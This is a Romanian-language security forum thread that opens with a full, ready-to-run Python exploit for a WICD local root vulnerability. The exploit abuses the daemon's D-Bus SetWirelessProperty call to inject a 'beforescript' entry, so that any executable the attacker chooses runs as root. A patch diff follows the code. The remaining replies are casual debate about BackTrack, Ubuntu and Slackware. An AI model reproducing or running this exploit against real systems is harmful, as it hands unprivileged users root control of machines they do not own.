Guest expl0iter Posted April 11, 2012 Report Posted April 11, 2012 #!/usr/bin/python#wicd 0day exploit discovered on 4.9.12 by InfoSec Institute student#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.htmlimport sysimport osimport timeimport getopttry: from wicd import dbusmanagerexcept: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)class Error(Exception): def __init__(self, error): self.errorStr=error def __str__(self): return repr(self.errorStr)class Wicd(): wireless=None daemon=None versionString=None def __init__(self): try: dbusmanager.connect_to_dbus() dbusInterfaces = dbusmanager.get_dbus_ifaces() self.wireless = dbusInterfaces["wireless"] self.daemon = dbusInterfaces["daemon"] except: raise Error("Daemon is not running") self.versionString = self.daemon.Hello() def versionLessThan(self, version): if int(self.versionString.replace(".",""))<=version: return True else: return Falseclass Exploit(): def __init__(self, wicd, scriptPath): self.wicd = wicd self.scriptPath = scriptPath def getNets(self): self.wicd.wireless.Scan(True) nets = self.wicd.wireless.GetNumberOfNetworks() while nets < 1: self.wicd.wireless.Scan(True) nets = self.wicd.wireless.GetNumberOfNetworks() for net in range(nets): yield net def exploit(self): for net in self.getNets(): pass # Priming scan. try: self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true") except: raise Error("Unable to exploit (SetWirelessProperty() failed.)") try: self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted") except: raise Error("Unable to exploit (SetWirelessProperty() failed.)") propertyKey = 'bssid' # Could be essid, or any other identifiable wireless property vulnIdentifier = self.wicd.wireless.GetWirelessProperty(0, propertyKey) # TODO: Does this need a try construct? self.wicd.wireless.ReloadConfig() for net in self.getNets(): # Implicit, but required re-scan. if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier: self.wicd.wireless.ConnectWireless(net) return True raise Error("Unable to exploit (Lost the network we were using)")def usage(): print "[!] Usage:" print " ( -h, --help ):" print " Print this message." print " ( --scriptPath= ): Required, executable to run as root." print " --scriptPath=/some/path/to/executable.sh"def main(): print "[$] WICD =< 1.7.0Day" try: opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="]) except getopt.GetoptError, err: # Print help information and exit: print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized" usage() sys.exit(0) scriptPath=None for opt, arg in opts: if opt in ("-h", "--help"): usage() sys.exit(0) elif opt =="--scriptPath": scriptPath=arg else: # I would be assuming to say we'll never get here. print "[!] Parameter error." usage() sys.exit(0) if not scriptPath: print "[!] Parameter error: scriptPath not set." usage() sys.exit(0) try: wicd = Wicd() except Error as error: print "[!] WICD Error: %s" % (error.errorStr) exit(0) print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString) if not wicd.versionLessThan(171): print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow." exploit = Exploit(wicd, scriptPath) print "[*] Attempting to exploit:" try: exploit.exploit() except Error as error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0) print "[*] Exploit appears to have worked."# Standard boilerplate to call the main() function to begin# the program.if __name__=='__main__': main()==========================================PATCH:- --- _wicd-daemon.py 2012-04-09 16:31:19.000000000 -0400+++ wicd-daemon.py 2012-02-02 11:38:26.000000000 -0500@@ -945,30 +945,6 @@ self._scanning = False self.LastScan = [] self.config = ConfigManager(wireless_conf, debug=debug)- -- - #Using a dict to avoid repitition.- - self._validProperties = {- - 'bssid':None,- - "essid":None,- - "hidden":None,- - "channel":None,- - "mode":None,- - "enctype":None,- - "encryption_method":None,- - "key":None,- - "automatic":None,- - "ip":None,- - "netmask":None,- - "broadcast":None,- - "gateway":None,- - "use_static_dns":None,- - "use_global_dns":None,- - "dns1":None,- - "dns2":None,- - "dns3":None,- - "use_settings_globally":None,- - "has_profile":None- -} def get_debug_mode(self): return self._debug_mode@@ -1088,7 +1064,7 @@ def SetWirelessProperty(self, netid, prop, value): """ Sets property to value in network specified. """ # We don't write script settings here.- - if (prop.strip() not in self._validProperties):+ if (prop.strip()).endswith("script"): print "Setting script properties through the daemon is not" \ + " permitted." return False Quote
SirGod Posted April 11, 2012 Report Posted April 11, 2012 http://www.backtrack-linux.org/forums/showthread.php?t=49411Cititi ce zice muts. Quote
pr00f Posted April 11, 2012 Report Posted April 11, 2012 S?-l ia naiba de RC2, nu-i merge conectarea la wireless pe adrese protejate cu WEP. Quote
pyth0n3 Posted April 11, 2012 Report Posted April 11, 2012 Backtrack este destinat sa ruleze din LiveCD nefiind un sistem operativ stabil pentru a fi instalat.Exista diverse alte sisteme operative care pot fi folosite pentru acest scop.Problem solved. Quote
co4ie Posted April 12, 2012 Report Posted April 12, 2012 Zice bine Muts ... Nu este de competenta echipei Backtrack sa faca/aplice un patch la un produs care nu este al lor ! Probabil exploitul pt Wicd este pentru toate distributiile dar a fost scos in fata doar pt ca este default in Backtrack !@pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conectiunii la wifi (wep/wpa) eu nu am avut nici cea ai mica problema cu el ! Quote
Cheater Posted April 12, 2012 Report Posted April 12, 2012 Eh bt, are multe gauri, poate ne jucam la defcamp cu asta Quote
pyth0n3 Posted April 12, 2012 Report Posted April 12, 2012 (edited) @pyth0n3: Functioneaza destul de bine ca si OS instalat ... Eu nu am avut probleme pana acum cu el si in afara de stabilitatea conectiunii la wifi (wep/wpa) eu nu am avut nici cea ai mica problema cu el !Nu am zis ca nu functioneaza dar nu e ceea ce pare sau cel putin de cand nu mai e Slackware , Backtrack == Ubuntu , vine numit backtrack doar pentru un suite de tool-uri pe care le-au pus deasupra Au trecut de la Slackware la Ubuntu deoarece nu ar fi avut un mare success avand in vedere faptul ca multi nu ar fi fost in grad sa instaleze un Slackware in schimb ubuntu e foarte usor de instalat si oricare poate avea backtrack (asa creste numele),Avand in vedere faptul ca nu e facut ca sa fie folosit ca un sistem de baza e ok , atata timp cat il folosesti din LiveCD .Evident se poate instala dar nu e definit ca un sistem de baza .As fi preferat slackware , de aceea eu nu folosesc backtrack (Asta e parerea mea) Edited April 12, 2012 by pyth0n3 Quote
vladimir Posted April 12, 2012 Report Posted April 12, 2012 pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume, de back track 5.r2 sau precum e fedora sau mandrila, si asa mai departe,ca e vorba de reclama, folositi ubuntu, e si mai bun ca back track, ceea ce ai in back track poti pune in ubuntu.in plus back track, nu numai live cd, si instalat bine facuta bine partitia, dupa aia ruleaza bine, dar eu tot raman cu ubuntu. Quote
co4ie Posted April 12, 2012 Report Posted April 12, 2012 (edited) @vladimir: Vorbesti aiurea ... Backtrack este 95% Ubuntu si "vine numit backtrack doar pentru suitele de tool-uri instalate " dupa cum a precizat Pythone ! BTW se numeste Mandriva ... Si nu poti spune ca Ubuntu este cea mai buna distributie doar pentru ca iti place tie sau ca toti copii pot da clickuri si cred ei ca stiu linux !Intradevar Ubuntu are parte de cel mai bun suport la ora actuala dar daca ai probleme in loc sa incerci sa le rezolvi fugi repede la nenea gogu si dai copy/paste de pe forumuri !! Cea mai buna distributie este cea cu care lucrezi tu personal cel mai bine .. Si asta o sa iti spuna orice sysadmin cat de cat competent !@pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ... Cel mai probabil alegerea lor a fost facuta pentru popularitatea distributiei si pentru ca 99% din persoanele care stiu sa lucreze in astfel de medii se simt cat de cat confortabil cu Ubuntu ! Edited April 12, 2012 by co4ie Quote
pyth0n3 Posted April 12, 2012 Report Posted April 12, 2012 (edited) pyth0n3 linux, ubuntu este cel mai bun, si nu te uita dupa nume, Singurele distro Linux despre care putem vorbi si pune in confrunt intre ele sunt: Debian,RedHat,Slackware,Suse, restul sunt doar derivate , Ubuntu e un derivat si nu il voi pune in confrunt cu nici una din distributiile de mai sus.Eu cand voi vorbi de Linux ma voi referi doar la 4 distributii iar cand ma voi referi la derivate voi specifica cine este tatal.@pythone: sunt sigur ca cei care folosesc Backtrack exact pentru ceea ce a fost creat stiu/"sunt in stare" sa instaleze Slackware ... In privinta asta nu am nici un dubiu, ma refeream la final users.Sunt mai multi fani Ubuntu si e mai usor de aceea au ales ca suit-ul de tool-uri sa fie in ubuntu.Eu as fi preferat sa ramana o distributie pura ca Slackware .(Asta e doar una din parerile mele)Ei au facut ceea ce au crezut mai bine pentru final users.Oricum e destinat pentru pentesting LiveCD dar poate fi si instalat evident. Edited April 12, 2012 by pyth0n3 Quote
Nytro Posted April 12, 2012 Report Posted April 12, 2012 https://www.secmaniac.com/blog/2012/04/12/disallowing-infosec-institute-to-leverage-set/ Quote
backdoor Posted April 18, 2012 Report Posted April 18, 2012 Interesanta descoperire. Pt cei care stiu cu ce se manaca backtrack : cum te conectezi la un backtrack prin retea cand sigurul serviciu este postgresql cu bind 127.0.0.1 ? Cat despre disctutia offtopic de mai sus: Ce conteaza pe ce OS au pus utilitarele ? Probabil ca au ales uBuntu tocmai pt ca kernelul e compilat cu full support pentru cam tot ce misca networking/video/sound . Quote